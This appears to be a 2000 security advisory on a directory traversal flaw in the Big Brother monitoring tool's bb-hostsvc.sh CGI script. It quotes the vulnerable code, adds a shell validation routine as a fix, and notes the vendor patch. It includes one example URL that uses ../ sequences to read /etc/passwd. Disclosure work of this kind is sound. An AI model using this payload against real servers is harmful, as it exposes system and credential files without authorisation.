    -----------------.---------------------------------------------.
  /|                 |                             .               |
 / | :               : :             : :             :             |
|  | ::        ------  ::            : ::          | ::     -      |-----
|  | ::              : ::     .      :      |      | ::            :     |
|  |                 :        .      |------|      |               :     |
|  |           ------^        :      |     /       |                     .
|  ;----------"---------------^------     /  ------'---------------------
| /          /               /      /----'        /                     /
|'----------'---------------'------'     --------'---------------------'
                                www.f8labs.com


[ INTRODUCTION ]


Advisory .........: Big Brother Technologies
Release Date .....: 07-14-00
Application ......: /cgi-bin/bb-hostsvc.sh
Vendor Web Site ..: www.bb4.com
Versions Affected.: All versions prior to and including v1.4h
Vendor Status ....: Contacted / New version released
WWW ..............: www.f8labs.com


[ OVERVIEW ]

The contents of any file on the remote system can be viewed, including
/etc/passwd or /etc/shadow.


The problem lies in the code where the value assigned to $HOSTSVC is used
without any validation: it is taken straight from the query string and
placed directly into a file path.


---- snip ----
# get the color of the status from the status file
# ($HOSTSVC is the unchecked request parameter; it is joined to $BBLOGS
#  as-is, so a value containing ../ escapes the log directory)
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1
BKG="$1"
---- snap ----


e.g. http://www.target.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
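One way to close the hole is to validate HOSTSVC before it ever reaches the file path. The following is an added example, not code from the advisory or from the Big Brother distribution; it assumes status files are named <host>.<service> directly under $BBLOGS, and the demo log directory and status line are constructed for illustration.

```shell
#!/bin/sh
# Added example: validate the HOSTSVC parameter before building a path.
# Assumption: Big Brother status files are single path components named
# "<host>.<service>" inside $BBLOGS (naming convention assumed here).

BBLOGS="${BBLOGS:-${TMPDIR:-/tmp}/bb-hostsvc-example}"   # constructed demo dir

# valid_hostsvc NAME -> 0 only if NAME is a single path component made of
# [A-Za-z0-9._-], contains no "/" and does not start with "." (so ".", ".."
# and hidden files are refused). Anything else returns 1.
valid_hostsvc() {
    case "$1" in
        ''|*/*|.*)          return 1 ;;   # empty, any slash, leading dot
        *[!A-Za-z0-9._-]*)  return 1 ;;   # any character outside the allowlist
    esac
    return 0
}

# status_color NAME -> prints the first line of the status file (the color),
# like the original script, but only after NAME passes valid_hostsvc and the
# file exists inside $BBLOGS. Prints nothing and returns 1 otherwise.
status_color() {
    valid_hostsvc "$1" || return 1
    f="$BBLOGS/$1"
    [ -f "$f" ] || return 1
    head -n 1 "$f"
}

# Constructed demo data: one legitimate status file.
mkdir -p "$BBLOGS"
printf 'green Tue Jul 11 12:00:00 2000 ok\n' > "$BBLOGS/www.example.com.http"
```

Because the check rejects any slash rather than trying to strip "../", encoded or doubled traversal sequences never reach the path concatenation at all.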


BB4 Technologies has already been notified and a patch is already out.
It can be downloaded from http://www.bb4.com/download.html

